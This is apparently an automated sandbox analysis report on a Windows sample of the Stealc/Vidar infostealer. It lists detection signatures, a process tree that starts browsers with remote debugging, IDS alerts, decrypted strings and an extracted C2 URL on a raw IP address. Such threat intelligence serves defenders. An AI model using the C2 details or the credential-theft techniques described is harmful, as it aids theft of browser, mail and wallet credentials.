Edit tour

Windows Analysis Report
HrxOpVxK5d.exe

Overview

General Information

Sample name:	HrxOpVxK5d.exe renamed because original name is a hash value
Original sample name:	c4ac7a7ee7a9529b0148d9a64c43801b.exe
Analysis ID:	1552559
MD5:	c4ac7a7ee7a9529b0148d9a64c43801b
SHA1:	f069ce0f887af125aa606f004f0b7baaf725f300
SHA256:	7a3c1f0a826eec9b77bbe25a3da2db497d2005238c494190f075b0a22b21006d
Tags:	exeStealcuser-abuse_ch
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for sample

Monitors registry run keys for changes

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

AV process strings found (often used to terminate AV products)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

One or more processes crash

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Browser Started with Remote Debugging

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

HrxOpVxK5d.exe (PID: 6396 cmdline: "C:\Users\user\Desktop\HrxOpVxK5d.exe" MD5: C4AC7A7EE7A9529B0148D9A64C43801B)

chrome.exe (PID: 7012 cmdline: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 7364 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2640 --field-trial-handle=2340,i,8805815916245064741,14049672499791549619,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

msedge.exe (PID: 8000 cmdline: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 1168 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2848 --field-trial-handle=2556,i,10855429805949803760,7672887330153088567,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

WerFault.exe (PID: 8368 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6396 -s 2436 MD5: C31336C1EFC2CCB44B4326EA793040F2)

msedge.exe (PID: 5528 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 1792 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2092,i,15195154386885760925,7904617006657469936,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8256 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6980 --field-trial-handle=2092,i,15195154386885760925,7904617006657469936,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8264 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7132 --field-trial-handle=2092,i,15195154386885760925,7904617006657469936,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8060 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=5308 --field-trial-handle=2092,i,15195154386885760925,7904617006657469936,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://77.220.212.32/eb51242cada87444.php", "Botnet": "LogsDiller"}

Threatname: Vidar

{"C2 url": "http://77.220.212.32/eb51242cada87444.php", "Botnet": "LogsDiller"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1775076444.0000000002CC2000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1508:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000003.1260620035.00000000049E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1775137644.0000000002D38000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1775489473.0000000004900000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1775489473.0000000004900000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Process Memory Space: HrxOpVxK5d.exe PID: 6396	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: HrxOpVxK5d.exe PID: 6396	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: HrxOpVxK5d.exe PID: 6396	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: HrxOpVxK5d.exe PID: 6396	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.HrxOpVxK5d.exe.400000.1.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.3.HrxOpVxK5d.exe.49e0000.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.HrxOpVxK5d.exe.4900e67.3.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.HrxOpVxK5d.exe.4900e67.3.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.3.HrxOpVxK5d.exe.49e0000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.HrxOpVxK5d.exe.400000.1.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\HrxOpVxK5d.exe", ParentImage: C:\Users\user\Desktop\HrxOpVxK5d.exe, ParentProcessId: 6396, ParentProcessName: HrxOpVxK5d.exe, ProcessCommandLine: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", ProcessId: 7012, ProcessName: chrome.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-09T02:47:23.666031+0100	2022930	1	A Network Trojan was detected	4.245.163.56	443	192.168.2.7	49754	TCP
2024-11-09T02:47:56.883045+0100	2022930	1	A Network Trojan was detected	4.245.163.56	443	192.168.2.7	27888	TCP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-09T02:47:09.228618+0100	2044245	1	Malware Command and Control Activity Detected	77.220.212.32	80	192.168.2.7	49699	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-09T02:47:09.103046+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.7	49699	77.220.212.32	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-09T02:47:09.464728+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.7	49699	77.220.212.32	80	TCP

ET MALWARE Win32/Stealc Submitting Screenshot to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-09T02:47:40.150338+0100	2044249	1	Malware Command and Control Activity Detected	192.168.2.7	52982	77.220.212.32	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-09T02:47:10.383865+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.7	49699	77.220.212.32	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-09T02:47:09.471345+0100	2044247	1	Malware Command and Control Activity Detected	77.220.212.32	80	192.168.2.7	49699	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-09T02:47:08.860469+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.7	49699	77.220.212.32	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-09T02:47:10.851417+0100	2803304	3	Unknown Traffic	192.168.2.7	49699	77.220.212.32	80	TCP
2024-11-09T02:47:33.541353+0100	2803304	3	Unknown Traffic	192.168.2.7	52982	77.220.212.32	80	TCP
2024-11-09T02:47:34.544732+0100	2803304	3	Unknown Traffic	192.168.2.7	52982	77.220.212.32	80	TCP
2024-11-09T02:47:35.204399+0100	2803304	3	Unknown Traffic	192.168.2.7	52982	77.220.212.32	80	TCP
2024-11-09T02:47:35.625979+0100	2803304	3	Unknown Traffic	192.168.2.7	52982	77.220.212.32	80	TCP
2024-11-09T02:47:36.827114+0100	2803304	3	Unknown Traffic	192.168.2.7	52982	77.220.212.32	80	TCP
2024-11-09T02:47:37.251165+0100	2803304	3	Unknown Traffic	192.168.2.7	52982	77.220.212.32	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000003.1260620035.00000000049E0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://77.220.212.32/eb51242cada87444.php", "Botnet": "LogsDiller"}
Source: 00000000.00000003.1260620035.00000000049E0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": "http://77.220.212.32/eb51242cada87444.php", "Botnet": "LogsDiller"}

Multi AV Scanner detection for submitted file

Source: HrxOpVxK5d.exe	ReversingLabs: Detection: 52%
Source: HrxOpVxK5d.exe	Virustotal: Detection: 45%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: HrxOpVxK5d.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: INSERT_KEY_HERE
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: 22
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: 11
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: 20
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: 24
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetProcAddress
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: LoadLibraryA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: lstrcatA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: OpenEventA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: CreateEventA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: CloseHandle
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: Sleep
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetUserDefaultLangID
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: VirtualAllocExNuma
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: VirtualFree
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetSystemInfo
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: VirtualAlloc
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: HeapAlloc
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetComputerNameA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: lstrcpyA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetProcessHeap
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetCurrentProcess
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: lstrlenA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: ExitProcess
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GlobalMemoryStatusEx
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetSystemTime
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: SystemTimeToFileTime
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: advapi32.dll
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: gdi32.dll
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: user32.dll
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: crypt32.dll
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: ntdll.dll
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetUserNameA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: CreateDCA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetDeviceCaps
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: ReleaseDC
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: CryptStringToBinaryA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: sscanf
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: VMwareVMware
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: HAL9TH
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: JohnDoe
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: DISPLAY
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: %hu/%hu/%hu
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: http://77.220.212.32
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: gjtwvm
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: /eb51242cada87444.php
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: /241bc8c289ca83f4/
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: LogsDiller
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetEnvironmentVariableA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetFileAttributesA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GlobalLock
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: HeapFree
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetFileSize
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GlobalSize
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: IsWow64Process
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: Process32Next
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetLocalTime
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: FreeLibrary
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetTimeZoneInformation
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetSystemPowerStatus
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetVolumeInformationA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetWindowsDirectoryA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: Process32First
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetLocaleInfoA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetUserDefaultLocaleName
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetModuleFileNameA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: DeleteFileA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: FindNextFileA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: LocalFree
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: FindClose
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: SetEnvironmentVariableA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: LocalAlloc
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetFileSizeEx
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: ReadFile
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: SetFilePointer
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: WriteFile
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: CreateFileA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: FindFirstFileA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: CopyFileA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: VirtualProtect
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetLastError
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: lstrcpynA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: MultiByteToWideChar
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GlobalFree
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: WideCharToMultiByte
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GlobalAlloc
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: OpenProcess
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: TerminateProcess
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetCurrentProcessId
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: gdiplus.dll
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: ole32.dll
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: bcrypt.dll
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: wininet.dll
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: shlwapi.dll
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: shell32.dll
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: psapi.dll
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: rstrtmgr.dll
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: CreateCompatibleBitmap
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: SelectObject
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: BitBlt
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: DeleteObject
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: CreateCompatibleDC
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GdipGetImageEncodersSize
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GdipGetImageEncoders
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GdiplusStartup
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GdiplusShutdown
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GdipSaveImageToStream
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GdipDisposeImage
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GdipFree
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetHGlobalFromStream
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: CreateStreamOnHGlobal
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: CoUninitialize
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: CoInitialize
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: CoCreateInstance
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: BCryptDecrypt
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: BCryptSetProperty
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: BCryptDestroyKey
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetWindowRect
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetDesktopWindow
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetDC
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: CloseWindow
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: wsprintfA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: EnumDisplayDevicesA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: GetKeyboardLayoutList
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: CharToOemW
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: wsprintfW
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: RegQueryValueExA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: RegEnumKeyExA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: RegOpenKeyExA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: RegCloseKey
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: RegEnumValueA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: CryptBinaryToStringA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: CryptUnprotectData
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: SHGetFolderPathA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: ShellExecuteExA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: InternetOpenUrlA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: InternetConnectA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: InternetCloseHandle
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: InternetOpenA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: HttpSendRequestA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: HttpOpenRequestA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: InternetReadFile
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: InternetCrackUrlA
Source: 0.2.HrxOpVxK5d.exe.400000.1.unpack	String decryptor: StrCmpCA
